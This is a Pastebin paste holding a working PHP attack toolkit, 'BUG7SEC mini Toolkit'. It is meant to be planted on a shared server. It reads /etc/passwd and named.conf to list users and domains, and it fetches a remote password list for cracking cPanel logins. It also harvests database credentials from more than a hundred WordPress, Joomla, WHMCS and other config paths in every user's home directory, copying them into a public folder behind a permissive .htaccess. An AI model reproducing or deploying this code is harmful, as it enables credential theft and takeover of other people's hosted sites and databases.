Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- ?><!DOCTYPE html>
- <html>
- <head>
- <title>BUG7SEC mini Toolkit © 2016</title>
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
- <style type="text/css">
- body{
- color: #3EF403;
- background-color: #141516;
- }
- input {
- border: dashed 1px;
- border-color: #333;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: #0CFF37;
- }
- select {
- border: dashed 1px;
- border-color: #333;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: #0CFF37;
- }
- textarea {
- color: #fff;
- background-color: #555;
- border-style: dashed;
- font: 9pt Monospace,'Courier New';
- border-color: lime;
- background-color: black;
- }
- ul {
- list-style-type: none;
- margin: 0;
- padding: 0;
- overflow: hidden;
- text-align:center;
- border-style: inherit;
- }
- ul li {
- float: center;
- display:inline;
- margin-left: 1px;
- }
- li a{
- color:#3EF403;
- text-decoration: none;
- }
- .container{
- margin-left: 20%;
- margin-right: 20%;
- margin-bottom: 30px;
- margin-top: 26px;
- }
- </style>
- </head>
- <body>
- <div class="container">
- <pre>
- / .'
- .---. \/ BUG7SEC mini Toolkit © 2016
- (._.' \() By Shor7cut
- ^"""^"
- </pre>
- <ul>
- <li><a href="?">-[ Home ]-</a></li>
- <li><a href="?shc=cp">-[ Cpanel Killer ]-</a></li>
- <li><a href="?shc=ck">-[ Config Killer ]-</a></li>
- </ul>
- </div>
- <?php if($_GET['shc']=="cp"){?>
- <div class="container">
- <form action="" method="post">
- <table style="width:100%">
- <tr>
- <td>Username</td>
- <td>Password</td>
- <td></td>
- </tr>
- <tr>
- <td>
- <textarea style="margin: 0px; width: 384px; height: 204px;"><?php error_reporting(0); if($_POST['upass']){bug7sec::users($_POST['etc']);}?></textarea>
- </td>
- <td>
- <textarea style="margin: 0px; width: 329px; height: 204px;"><?php error_reporting(0); if($_POST['upass']){bug7sec::pass($_POST['pass']);}?></textarea>
- </td>
- </tr>
- <tr>
- <td>
- <select name="etc">
- <option value="/etc/passwd">/etc/passwd</option>
- <option value="/etc/passwd-">/etc/passwd-</option>
- <option value="/etc//passwd.OLD">/etc//passwd.OLD</option>
- <option value="/etc/group">/etc/group</option>
- </select>
- <input name="pass" value="https://pastebin.com/raw/nG3BR2nc" placeholder=" URL Password List" required="Link Nya mas">
- </td>
- <td>
- <input name="upass" type="submit" value="Get Username & Password">
- <input name="gtpass" type="submit" value="Cpanel Cracker">
- </td>
- </tr>
- </table>
- </form>
- </div>
- <pre>
- <?php
- }else if($_GET['shc']=="ck"){?>
- <div class="container">
- <center>
- <form action="" method="post">
- <input name="conkillers" type="submit" value="Config Killer">
- <input name="passkiller" type="submit" value="Get Password">
- </form>
- <?php
- if($_POST['conkillers']){
- bug7sec::configkiller();
- }
- if($_POST['passkiller']){
- echo "pass;";
- }
- ?>
- </center>
- </div>
- <?php
- }else{
- echo '<div class="container"><table style="width:100%">
- <tr>
- <td>'."-[ Domain : <font color=red>".bug7sec::countDomen()."</font> | Cpanel : <font color=red>".bug7sec::detectCPhost().'</font> ]-</td>
- </tr>
- <tr>
- <td>
- <textarea style="margin: 0px; width: 813px; height: 329px;">';
- bug7sec::domain();
- echo '</textarea>
- </td>
- </tr>
- </table></div>';
- }
- ?>
- </body>
- </html>
- <?php
- class bug7sec
- {
- function users($url)
- {
- preg_match_all('/(.*?):x:/', bug7sec::fgt($url) , $match);
- foreach ($match[1] as $key => $user) {
- echo $user."\r\n";
- }
- }
- function pass($url)
- {
- echo bug7sec::fgt($url);
- }
- function domain(){
- preg_match_all('/zone \"(.*?)\"/m', file_get_contents("/etc/named.conf"), $matches);
- foreach ($matches[1] as $key => $domen) {
- echo $domen."\r\n";
- }
- }
- function countDomen(){
- preg_match_all('/zone \"(.*?)\"/m', file_get_contents("/etc/named.conf"), $matches);
- return count($matches[1]);
- }
- function detectCPhost(){
- $re = "/#CPANEL (.*)/";
- preg_match($re, file_get_contents("/etc/named.conf"), $matches);
- if($matches[1]){
- return $matches[1];
- }else{
- return "-_- gak tau";
- }
- }
- function fgt($url){
- return file_get_contents($url);
- }
- function configkiller(){
- $ckne = "~shor7cut";
- rmdir($ckne);
- mkdir($ckne, 0777);
- $direc = array(
- 'home',
- 'home1',
- 'home2',
- 'home3',
- 'home4',
- 'home5',
- 'home6',
- 'home7',
- 'home8',
- 'home9',
- 'var/www',
- 'var/www/html',
- );
- $conkillers = array(
- "config/db.php",
- "connection/db.php",
- "wordpress/db.php",
- "db.php",
- "tomcat/conf/context.xml",
- "inc/config.php",
- "inc/koneksi.php",
- "inc/configuration.php",
- "home/config.php",
- "home/koneksi.php",
- "home/configuration.php",
- "backend/config/main-local.php",
- "app/etc/config.xml",
- "app/etc/locale.xml",
- "Configuration/Configuration.php",
- "content/configuration.php",
- "INJECTION/configuration.php",
- "xcert/configuration.php",
- "koneksi/koneksi.php",
- "perpus/koneksi.php",
- "log/koneksi.php",
- "gis/koneksi.php",
- "koneksi.php",
- "koneksi.xml",
- "lib/koneksi.php",
- "config/koneksi.php",
- "home/config/koneksi.php",
- "wp-config.php",
- "wordpress/wp-config.php",
- "docs/wp-config.php",
- "web/wp-config.php",
- "wp/wp-config.php",
- "press/wp-config.php",
- "wordpress/beta/wp-config.php",
- "news/wp-config.php",
- "new/wp-config.php",
- "blogs/wp-config.php",
- "home/wp-config.php",
- "blog/wp-config.php",
- "protal/wp-config.php",
- "site/wp-config.php",
- "main/wp-config.php",
- "test/wp-config.php",
- "wp/beta/wp-config.php",
- "beta/wp-config.php",
- "joomla/configuration.php",
- "protal/configuration.php",
- "joo/configuration.php",
- "cms/configuration.php",
- "site/configuration.php",
- "main/configuration.php",
- "news/configuration.php",
- "new/configuration.php",
- "home/configuration.php",
- "configuration.php",
- "SSI.php",
- "forum/SSI.php",
- "forum/inc/config.php",
- "forum/includes/config.php",
- "upload/includes/config.php",
- "cc/includes/config.php",
- "vb/includes/config.php",
- "vb3/includes/config.php",
- "cpanel/configuration.php",
- "panel/configuration.php",
- "ubmitticket.php",
- "manage/configuration.php",
- "myshop/configuration.php",
- "beta/configuration.php",
- "includes/config.php",
- "lib/config.php",
- "conf_global.php",
- "inc/config.php",
- "incl/config.php",
- "include/db.php",
- "include/config.php",
- "includes/functions.php",
- "includes/dist-configure.php",
- "connect.php",
- "connection.php",
- "mk_conf.php",
- "config/koneksi.php",
- "system/sistem.php",
- "config.php",
- "Settings.php",
- "settings.php",
- "sites/default/settings.php",
- "smf/Settings.php",
- "forum/Settings.php",
- "forums/Settings.php",
- "host/configuration.php",
- "hosting/configuration.php",
- "hosts/configuration.php",
- "zencart/includes/dist-configure.php",
- "shop/includes/dist-configure.php",
- "whm/configuration.php",
- "whmc/configuration.php",
- "whmcs/configuration.php",
- "whmc/WHM/configuration.php",
- "whm/WHMCS/configuration.php",
- "whm/whmcs/configuration.php",
- "order/configuration.php",
- "support/configuration.php",
- "supports/configuration.php",
- "oscommerce/includes/configure.php",
- "oscommerces/includes/configure.php",
- "shopping/includes/configure.php",
- "sale/includes/configure.php",
- "config.inc.php",
- "amember/config.inc.php",
- "clients/configuration.php",
- "client/configuration.php",
- "clientes/configuration.php",
- "cliente/configuration.php",
- "clientsupport/configuration.php",
- "billing/configuration.php",
- "billings/configuration.php",
- "admin/conf.php",
- "admin/config.php");
- if(fwrite(fopen('shc/.htaccess', 'w'), "#Bug7sec Team\r\nOptions ExecCGI Includes IncludesNOEXEC SymLinksIfOwnerMatch Indexes\r\nDirectoryIndex configs.html\r\nRequire None\r\nSatisfy Any\r\n")){
- echo "<br><font color=white>+</font> .htaccess telah terpasang<br>";
- }else{
- echo "<br><font color=red>+</font> .htaccess gagal terpasang<br>";
- }
- preg_match_all('/(.*?):x:/', bug7sec::fgt("/etc/passwd") , $match);
- if($match[1]){
- echo "<font color=white>+</font> ".count($match[1])." users<br>";
- }else{
- echo "<font color=red>+</font> null users<br>";
- }
- foreach ($match[1] as $key => $user) {
- foreach ($conkillers as $key => $patch) {
- foreach ($direc as $key => $homodir) {
- $home = "/$homodir/$user/public_html/$patch";
- $configet = bug7sec::fgt($home);
- if(!$configet==""){
- if(eregi("wp-config.php", $home)){
- $db = fopen("~shor7cut/$user-wordpress.txt","w");
- fputs($db,$configet);
- }else {
- $db = fopen("~shor7cut/$user-".time().".txt","w");
- fputs($db,$configet);
- }
- }
- }
- }
- }
- echo '<font color=red>-::[</font><a href="~shor7cut" target="_blank"><font color=white size=3 face=\"comic sans ms\">Config List</font></a><font color=red>]::-</font><br>';
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement